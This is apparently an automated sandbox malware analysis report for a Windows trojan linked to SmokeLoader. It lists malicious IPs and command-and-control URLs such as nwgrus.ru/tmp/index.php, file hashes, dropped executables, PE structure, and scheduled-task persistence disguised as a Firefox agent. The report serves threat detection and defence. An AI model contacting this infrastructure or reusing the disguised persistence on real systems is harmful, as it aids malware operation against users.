https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1734283056.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
186.233.231.45	unknown	Brazil	262675	SolucaoNetworkProvedorLtdaBR	true
116.58.10.60	nwgrus.ru	Pakistan	17563	NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1531374
Start date and time:	2024-10-11 06:36:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wBgwzVbZuV.exe renamed because original name is a hash value
Original Sample Name:	a50c051c3beb22a0f9ce8694fb4d0bab.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/4@26/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 82 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 40.126.32.76, 40.126.32.136, 20.190.160.17, 20.190.160.22, 40.126.32.134, 40.126.32.133, 40.126.32.68, 20.190.160.14
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target rghrbbi, PID 3900 because there are no executed function
Execution Graph export aborted for target wehrbbi, PID 3960 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:37:23	API Interceptor	417090x Sleep call for process: explorer.exe modified
05:36:48	Task Scheduler	Run new task: {72BD172C-641F-4DB0-BE70-8EC3BE0A0B29} path:
05:37:23	Task Scheduler	Run new task: Firefox Default Browser Agent 4FAE96DB80CD7C80 path: C:\Users\user\AppData\Roaming\wehrbbi
05:38:26	Task Scheduler	Run new task: Firefox Default Browser Agent F88236F8CC5A85B4 path: C:\Users\user\AppData\Roaming\rghrbbi

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
186.233.231.45	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	3pl0GSzVPg.exe	Get hash	malicious	SmokeLoader	Browse	olihonols.in.net/tmp/
116.58.10.60	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	7zaC3J8wBV.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	a6lzHWp4pa.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	bipto.org/tmp/index.php
23.145.40.164	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse
	Lk9rbSoFqa.exe	Get hash	malicious	SmokeLoader	Browse
	ctMI3TYXpX.exe	Get hash	malicious	SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	187.211.161.52
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	92.36.226.66
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	201.103.8.135
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	160.177.223.165
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse	181.52.122.51
	Lk9rbSoFqa.exe	Get hash	malicious	SmokeLoader	Browse	63.143.98.185
	ctMI3TYXpX.exe	Get hash	malicious	SmokeLoader	Browse	180.75.11.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SolucaoNetworkProvedorLtdaBR	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	186.233.231.45
	file.exe	Get hash	malicious	SmokeLoader	Browse	186.233.231.45
	3pl0GSzVPg.exe	Get hash	malicious	SmokeLoader	Browse	186.233.231.45
	OBbrO5rwew.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	186.233.231.45
	SecuriteInfo.com.Win32.DropperX-gen.32377.19302.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	186.233.231.45
NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	7zaC3J8wBV.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	116.58.10.60
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	y7cm9CKSN9.elf	Get hash	malicious	Mirai	Browse	116.58.43.103
	yJgVAg26w0.elf	Get hash	malicious	Mirai	Browse	116.58.43.106
	7ZEAQv0SZ6.elf	Get hash	malicious	Mirai, Moobot	Browse	202.59.68.26
	7048CflwYY.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	116.58.10.59
	a6lzHWp4pa.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	116.58.10.60
	2.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	WFdAK6HQgz.elf	Get hash	malicious	Unknown	Browse	202.59.68.69
SURFAIRWIRELESS-IN-01US	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Lk9rbSoFqa.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	ctMI3TYXpX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Lk9rbSoFqa.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	ctMI3TYXpX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F421.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	244736
Entropy (8bit):	5.848376152028521
Encrypted:	false
SSDEEP:	3072:adlDxJIN48blqsUwqPftttHBgqXmSHO5GXo7RZ9kwPRZyq+AZ/XR:aPQFblq88ttBmymrbkwpdH
MD5:	500B5F7BBE44E1C2370628C67AC45F67
SHA1:	47BD69068462630444A4E5C022254A2D3C7DCDDE
SHA-256:	4B8612E3D76F13CA83695A83B123734D35C0F4D75459BCE40596F37579E0B747
SHA-512:	54C9E23E2709FB33C4444EC3DD98B946A223D95CF6C192A1136B5CB6BCA7AFC2DB1437FAA6E9B9D74397C1F25DBDC0431F3F9618237EA97C888CC99F769F7C62
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o..o..o..=..o..=..o..=...o....o..o...o..=..o..=..o..=..o..Rich.o..........................PE..L....".d.................L....r..............`....@...........................s......W......................................$w..<.....r..............................................................................`...............................text....K.......L.................. ..`.rdata.......`... ...P..............@..@.data...\|.o..........p..............@....tuje....D....q..8..................@....wekigof.(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rghrbbi

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	244736
Entropy (8bit):	5.848376152028521
Encrypted:	false
SSDEEP:	3072:adlDxJIN48blqsUwqPftttHBgqXmSHO5GXo7RZ9kwPRZyq+AZ/XR:aPQFblq88ttBmymrbkwpdH
MD5:	500B5F7BBE44E1C2370628C67AC45F67
SHA1:	47BD69068462630444A4E5C022254A2D3C7DCDDE
SHA-256:	4B8612E3D76F13CA83695A83B123734D35C0F4D75459BCE40596F37579E0B747
SHA-512:	54C9E23E2709FB33C4444EC3DD98B946A223D95CF6C192A1136B5CB6BCA7AFC2DB1437FAA6E9B9D74397C1F25DBDC0431F3F9618237EA97C888CC99F769F7C62
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o..o..o..=..o..=..o..=...o....o..o...o..=..o..=..o..=..o..Rich.o..........................PE..L....".d.................L....r..............`....@...........................s......W......................................$w..<.....r..............................................................................`...............................text....K.......L.................. ..`.rdata.......`... ...P..............@..@.data...\|.o..........p..............@....tuje....D....q..8..................@....wekigof.(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wehrbbi

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	5.866867167050139
Encrypted:	false
SSDEEP:	3072:NI34v/yndPSaFnG1uHO5nXo9WjlkwZWjKq+AZ/XR:C3qKpTFdWBkwZWLH
MD5:	A50C051C3BEB22A0F9CE8694FB4D0BAB
SHA1:	40F81C46DF2C9DA0157BC9A9270C9A171DB284C9
SHA-256:	1C17F70CFD875C4780045BF42E6FA42C98A23B51E7869774F6C388DDE6C50F77
SHA-512:	210FB400950F920F7939D48A965C389E61FA2B01D480EEB241D0E4E38039FC1835D198FBCC496B62E7223703F595A46D350396EFDB46E6338181B14C6D172B57
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o..o..o..=..o..=..o..=...o....o..o...o..=..o..=..o..=..o..Rich.o..........................PE..L.....d.................P....r..............`....@...........................s.............................................$w..<.....r..............................................................................`...............................text....O.......P.................. ..`.rdata.......`... ...T..............@..@.data...\|.o..........t..............@....dejunug.D....q..8..................@....manu....(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wehrbbi:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.866867167050139
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wBgwzVbZuV.exe
File size:	245'760 bytes
MD5:	a50c051c3beb22a0f9ce8694fb4d0bab
SHA1:	40f81c46df2c9da0157bc9a9270c9a171db284c9
SHA256:	1c17f70cfd875c4780045bf42e6fa42c98a23b51e7869774f6c388dde6c50f77
SHA512:	210fb400950f920f7939d48a965c389e61fa2b01d480eeb241d0e4e38039fc1835d198fbcc496b62e7223703f595a46d350396efdb46e6338181b14c6d172b57
SSDEEP:	3072:NI34v/yndPSaFnG1uHO5nXo9WjlkwZWjKq+AZ/XR:C3qKpTFdWBkwZWLH
TLSH:	DB344B5176F2A056FBB7C975BD79D694193BFCE2AA70817E11002A3F1871EB08D42B23
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o...=...o...=...o...=...o.......o...o...o...=...o...=...o...=...o..Rich.o..........................PE..L......d...

File Icon


Icon Hash:	17694cb2b24d2117

Static PE Info

General

Entrypoint:	0x4013be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x648F94DA [Sun Jun 18 23:35:54 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a1500beb43e4667491e27fdba1510118

Entrypoint Preview

Instruction
call 00007F02B0DCCBD7h
jmp 00007F02B0DCA24Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00419398h], eax
mov dword ptr [00419394h], ecx
mov dword ptr [00419390h], edx
mov dword ptr [0041938Ch], ebx
mov dword ptr [00419388h], esi
mov dword ptr [00419384h], edi
mov word ptr [004193B0h], ss
mov word ptr [004193A4h], cs
mov word ptr [00419380h], ds
mov word ptr [0041937Ch], es
mov word ptr [00419378h], fs
mov word ptr [00419374h], gs
pushfd
pop dword ptr [004193A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041939Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004193A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004193ACh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004192E8h], 00010001h
mov eax, dword ptr [004193A0h]
mov dword ptr [0041929Ch], eax
mov dword ptr [00419290h], C0000409h
mov dword ptr [00419294h], 00000001h
mov eax, dword ptr [00418004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00418008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000D4h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17724	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2720000	0x1d608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x180	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14f0f	0x15000	0c523c8646db8fd22104634c76e0b06a	False	0.824462890625	data	7.553501827115452	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x1ff4	0x2000	73751f9de0172c9e60ba622bae4c7c41	False	0.3790283203125	data	5.614633243205824	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x18000	0x26fff7c	0x1400	4de33ba2bb06ca9e60a919999ceceda2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dejunug	0x2718000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.manu	0x271d000	0x2800	0x2800	1276481102f218c981e0324180bafd9f	False	0.00322265625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2720000	0x1d608	0x1d800	ccd30d640483e3f7f9698db2726859e9	False	0.4614671610169492	data	5.061501595959506	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x27209a0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5676972281449894
RT_ICON	0x2721848	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6425992779783394
RT_ICON	0x27220f0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6918202764976958
RT_ICON	0x27227b8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7492774566473989
RT_ICON	0x2722d20	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.516597510373444
RT_ICON	0x27252c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6184333958724203
RT_ICON	0x2726370	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6221311475409836
RT_ICON	0x2726cf8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7650709219858156
RT_ICON	0x27271d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.40031982942430705
RT_ICON	0x2728080	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5018050541516246
RT_ICON	0x2728928	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5230414746543779
RT_ICON	0x2728ff0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.5563583815028902
RT_ICON	0x2729558	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.3496887966804979
RT_ICON	0x272bb00	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.37429643527204504
RT_ICON	0x272cba8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.39877049180327867
RT_ICON	0x272d530	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.41312056737588654
RT_ICON	0x272da10	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39445628997867804
RT_ICON	0x272e8b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5573104693140795
RT_ICON	0x272f160	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6203917050691244
RT_ICON	0x272f828	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6358381502890174
RT_ICON	0x272fd90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.43198874296435275
RT_ICON	0x2730e38	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4278688524590164
RT_ICON	0x27317c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.47074468085106386
RT_ICON	0x2731c90	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.40031982942430705
RT_ICON	0x2732b38	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5018050541516246
RT_ICON	0x27333e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5230414746543779
RT_ICON	0x2733aa8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.5563583815028902
RT_ICON	0x2734010	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.3496887966804979
RT_ICON	0x27365b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.37429643527204504
RT_ICON	0x2737660	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.39877049180327867
RT_ICON	0x2737fe8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.41312056737588654
RT_STRING	0x2738680	0x370	data			0.4693181818181818
RT_STRING	0x27389f0	0x63e	data			0.43679599499374216
RT_STRING	0x2739030	0x55e	data			0.44759825327510916
RT_STRING	0x2739590	0x764	data			0.4275898520084567
RT_STRING	0x2739cf8	0x698	data			0.4277251184834123
RT_STRING	0x273a390	0x906	data			0.41255411255411256
RT_STRING	0x273ac98	0x746	data			0.42910848549946295
RT_STRING	0x273b3e0	0x71a	data			0.4218921892189219
RT_STRING	0x273bb00	0x8fa	data			0.4112271540469974
RT_STRING	0x273c400	0x524	data			0.4566869300911854
RT_STRING	0x273c928	0x7a8	data			0.42857142857142855
RT_STRING	0x273d0d0	0x464	data			0.44483985765124556
RT_STRING	0x273d538	0xce	data			0.558252427184466
RT_GROUP_ICON	0x272d998	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x2738450	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x2727160	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2731c28	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x27384c8	0x1b8	COM executable for DOS			0.5886363636363636

Imports

DLL

Import

KERNEL32.dll

